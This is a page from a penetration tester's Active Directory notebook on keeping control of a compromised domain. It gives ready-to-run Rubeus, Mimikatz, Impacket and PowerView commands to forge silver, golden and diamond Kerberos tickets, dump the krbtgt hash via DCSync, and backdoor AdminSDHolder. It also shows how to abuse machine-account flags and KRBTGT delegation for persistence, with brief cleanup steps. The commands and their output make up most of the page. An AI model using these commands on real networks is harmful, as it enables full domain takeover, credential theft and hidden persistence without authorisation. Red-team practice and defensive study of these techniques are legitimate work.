Dominance

Search…
Dominance
Silver Ticket
​https://en.hackndo.com/kerberos-silver-golden-tickets/#silver-ticket​
Rubeus
Impacket
Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
$ getST.py megacorp.local/'SRV01#x27; -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator'
Golden Ticket
​https://en.hackndo.com/kerberos-silver-golden-tickets/#golden-ticket​
​https://artkond.com/2016/12/18/pivoting-kerberos/​
Mimikatz
Impacket
Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
$ ticketer.py -nthash 00ff00ff00ff00ff00ff00ff00ff00ff -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain megacorp.local snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/[email protected] -k -no-pass
$ secretsdump.py megacorp.local/[email protected] -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass
Diamond Ticket
​https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/​
AdminSDHolder Modification
​https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence​
​https://attack.stealthbits.com/adminsdholder-modification-ad-persistence​
​https://pentestlab.blog/2022/01/04/domain-persistence-adminsdholder/​
Create a Backdoor
Add a new domain user or grant an existent user GenericAll permissions for the AdminSDHolder container:
PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose
Check that granting AdminSDHolder permissions was successful (may take 60+ minutes for the security ACLs to get updated for that user):
PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
​
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
​
AceType               : AccessAllowed
ObjectDN              : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             :
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed
Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyways after adding the backdoor user to a protected group for the first time):
PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
​
AceType               : AccessAllowed
ObjectDN              : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength          : 0
ObjectSID             : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags      : None
BinaryLength          : 36
IsInherited           : False
IsCallback            : False
PropagationFlags      : None
SecurityIdentifier    : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask            : 983551
AuditFlags            : None
AceFlags              : None
AceQualifier          : AccessAllowed
​
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
​
admincount
----------
         1
Remove the Backdoor
​https://www.reddefenseglobal.com/blog/microsoft-domain-attack-techniques/admincount/​
​https://www.ucunleashed.com/1621​
Disable or remove the account (if a new user was created):
PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del
Remove user AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (will be resetted if the user is still in the AdminSDHolder container):
PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount
Fix the inheritance rules:
PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True  # procced if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False
SERVER_TRUST_ACCOUNT
​https://stealthbits.com/blog/server-untrust-account/​
When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
​
name        primarygroupid        useraccountcontrol
----        --------------        ------------------
FakeMachine            515 WORKSTATION_TRUST_ACCOUNT
2. Set the SERVER_TRUST_ACCOUNT bit:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
​
name        primarygroupid   useraccountcontrol
----        --------------   ------------------
FakeMachine            516 SERVER_TRUST_ACCOUNT
3. Perform DCSync:
$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
4. Cleanup:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine
KRBTGT Constrained Delegation
​https://skyblue.team/posts/delegate-krbtgt/​
Windows
Linux
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"[email protected]("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
​https://gist.github.com/snovvcrash/c8f8fa7721c40f4cca0c46c196066a41​
# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to be' WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1#x27; -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01#x27;
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc
DnsAdmins
GPO Abuse
Last modified 27d ago
Copy link
Outline
Silver Ticket
Golden Ticket
Diamond Ticket
AdminSDHolder Modification
Create a Backdoor
Remove the Backdoor
SERVER_TRUST_ACCOUNT
KRBTGT Constrained Delegation